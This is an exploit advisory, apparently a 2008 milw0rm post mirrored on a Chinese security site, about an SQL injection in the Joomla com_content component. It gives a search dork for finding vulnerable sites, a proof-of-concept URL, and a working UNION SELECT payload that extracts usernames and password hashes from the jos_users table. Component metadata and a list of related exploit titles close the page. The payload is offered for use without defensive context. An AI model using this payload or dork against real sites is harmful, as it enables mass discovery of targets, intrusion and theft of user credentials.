-------------------------------------------------------------------------------------------
Joomla Component com_content SQL Injection Vulnerabity
-------------------------------------------------------------------------------------------
Author : unknown_styler
Dork : inurl:com_content
POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999 union select 1,concat_ws(0x3a,username,password),3,4,5 from jos_users/*
------------------------------------------------------------------------------------------------------------------------------------
Greetings : h4ck-y0u.org
side note:
<name>Página de contenido</name>
<author>Projecte Joomla!</author>
<creationDate>July 2004</creationDate>
<copyright>(C) 2005 Open Source Matters. All rights reserved.</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>1.0.0</version>
# milw0rm.com [2008-07-08]
【Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln】相关文章:
★ Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ Joomla Component DT Register Remote SQL injection Vulnerability
★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
★ Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
★ tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
★ AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
★ Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities